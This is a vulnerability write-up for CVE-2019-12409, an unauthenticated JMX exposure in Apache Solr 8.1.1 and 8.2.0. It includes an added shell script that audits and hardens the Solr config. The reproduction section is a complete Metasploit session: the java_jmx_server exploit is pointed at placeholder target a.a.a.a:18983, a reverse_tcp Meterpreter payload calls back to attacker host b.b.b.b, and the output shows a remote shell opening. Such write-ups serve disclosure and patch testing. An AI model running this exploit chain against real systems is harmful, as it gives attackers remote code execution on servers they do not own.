File: (CVE-2019-12409)Apache Solr 远程命令执行漏洞.md (4.44 KB, 2021-04-21 09:23:46)
(CVE-2019-12409) Apache Solr JMX Remote Command Execution Vulnerability
==================================================

1. Vulnerability Summary
------------

Apache Solr 8.1.1 and 8.2.0 on **Linux** ship an insecure default in ***solr.sh***: `ENABLE_REMOTE_JMX_OPTS="true"`. With this setting the JMX monitoring service is started and listens on RMI port 18983 on the public network interface, without requiring any authentication.

2. Affected Versions
------------

Apache Solr 8.1.1 and 8.2.0

3. Reproduction
------------
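An added defensive example, not code from the original page or from the Solr project: it audits the `bin/solr.in.sh` startup file (the file the page calls solr.sh) for the uncommented `ENABLE_REMOTE_JMX_OPTS="true"` default, rewrites it to off, and checks a JVM command line for the resulting unauthenticated JMX port. The config samples and the JVM argument string are constructed; the mapping of the setting onto `-Dcom.sun.management.jmxremote.*` options is an assumption about Solr's launcher.

```shell
#!/bin/sh
# Added example (not from the page or the Solr project): audit a Solr
# bin/solr.in.sh for the CVE-2019-12409 default, switch it off, and check a
# running JVM's command line for the same exposure.

# Constructed sample of the vulnerable setting: remote JMX on, RMI port 18983.
VULN_CFG='# Enable remote JMX access by uncommenting the property below and setting RMI_PORT.
ENABLE_REMOTE_JMX_OPTS="true"
RMI_PORT=18983'
# Constructed sample of a safe file: the option stays commented out.
SAFE_CFG='#ENABLE_REMOTE_JMX_OPTS="true"
#RMI_PORT=18983'
VULN_FILE=$(mktemp) && printf '%s\n' "$VULN_CFG" > "$VULN_FILE"
SAFE_FILE=$(mktemp) && printf '%s\n' "$SAFE_CFG" > "$SAFE_FILE"

# solr_jmx_exposed FILE: exit 0 when an uncommented ENABLE_REMOTE_JMX_OPTS
# line sets the option to true (quoted or not), else exit 1.
solr_jmx_exposed() {
  grep -Eq "^[[:space:]]*ENABLE_REMOTE_JMX_OPTS=[\"']?true[\"']?[[:space:]]*\$" "$1"
}

# solr_jmx_port FILE: print the configured RMI_PORT, or "unset".
solr_jmx_port() {
  port=$(sed -n -E "s/^[[:space:]]*RMI_PORT=[\"']?([0-9]+).*/\\1/p" "$1" | tail -n 1)
  printf '%s\n' "${port:-unset}"
}

# harden_solr_jmx FILE: rewrite FILE in place (keeping FILE.bak) so remote
# JMX is off; Solr must be restarted for the change to apply.
harden_solr_jmx() {
  sed -i.bak -E "s/^([[:space:]]*)ENABLE_REMOTE_JMX_OPTS=.*/\\1ENABLE_REMOTE_JMX_OPTS=\"false\"/" "$1"
}

# jvm_jmx_unauthenticated ARGS: exit 0 when a JVM command line (for example
# from `ps -o args= -p <solr pid>`) opens a JMX port with authentication
# disabled. Assumes, as Solr's launcher does, that the shell setting becomes
# -Dcom.sun.management.jmxremote.* options.
jvm_jmx_unauthenticated() {
  case "$1" in *-Dcom.sun.management.jmxremote.port=*) ;; *) return 1 ;; esac
  case "$1" in *-Dcom.sun.management.jmxremote.authenticate=false*) return 0 ;; esac
  return 1
}

# Constructed command line resembling what an affected Solr JVM shows.
SAMPLE_ARGS='java -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=18983 -Dcom.sun.management.jmxremote.authenticate=false -jar start.jar'

solr_jmx_exposed "$VULN_FILE" && echo "solr.in.sh enables remote JMX on port $(solr_jmx_port "$VULN_FILE")"
```

On a live host, point `solr_jmx_exposed` and `harden_solr_jmx` at the real `bin/solr.in.sh` and feed `jvm_jmx_unauthenticated` the output of `ps -o args=` for the Solr process.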
    
    msf5 > use multi/misc/java_jmx_server
    msf5 exploit(multi/misc/java_jmx_server) > show options

    Module options (exploit/multi/misc/java_jmx_server):

       Name          Current Setting  Required  Description
       ----          ---------------  --------  -----------
       JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound
       JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint
       JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint
       RHOSTS                         yes       The target address range or CIDR identifier
       RPORT                          yes       The target port (TCP)
       SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT       8080             yes       The local port to listen on.
       SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                        no        The URI to use for this exploit (default is random)


    Exploit target:

       Id  Name
       --  ----
       0   Generic (Java Payload)


    msf5 exploit(multi/misc/java_jmx_server) > set RHOSTS a.a.a.a
    RHOSTS => a.a.a.a
    msf5 exploit(multi/misc/java_jmx_server) > set RPORT 18983
    RPORT => 18983
    msf5 exploit(multi/misc/java_jmx_server) > set payload java/meterpreter/reverse_tcp
    payload => java/meterpreter/reverse_tcp
    msf5 exploit(multi/misc/java_jmx_server) > show options

    Module options (exploit/multi/misc/java_jmx_server):

       Name          Current Setting  Required  Description
       ----          ---------------  --------  -----------
       JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound
       JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint
       JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint
       RHOSTS        a.a.a.a     yes       The target address range or CIDR identifier
       RPORT         18983            yes       The target port (TCP)
       SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT       8080             yes       The local port to listen on.
       SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                        no        The URI to use for this exploit (default is random)


    Payload options (java/meterpreter/reverse_tcp):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       0   Generic (Java Payload)


    msf5 exploit(multi/misc/java_jmx_server) > set LHOST b.b.b.b
    LHOST => b.b.b.b
    msf5 exploit(multi/misc/java_jmx_server) > run
    [*] Started reverse TCP handler on b.b.b.b:4444
    [*] a.a.a.a:18983 - Using URL: http://b.b.b.b:8080/OcbYS8uaTPDH
    [*] a.a.a.a:18983 - Sending RMI Header...
    [*] a.a.a.a:18983 - Discovering the JMXRMI endpoint...
    [+] a.a.a.a:18983 - JMXRMI endpoint on a.a.a.a:18983
    [*] a.a.a.a:18983 - Proceeding with handshake...
    [+] a.a.a.a:18983 - Handshake with JMX MBean server on a.a.a.a:18983
    [*] a.a.a.a:18983 - Loading payload...
    [*] a.a.a.a:18983 - Replied to request for mlet
    [*] a.a.a.a:18983 - Replied to request for payload JAR
    [*] a.a.a.a:18983 - Executing payload...
    [*] a.a.a.a:18983 - Replied to request for payload JAR
    [*] Sending stage (53867 bytes) to a.a.a.a
    [*] Meterpreter session 1 opened (a.a.a.a:4444 -> b.b.b.b:46582) at 2019-11-21 15:24:53 +0000

    meterpreter >
    
    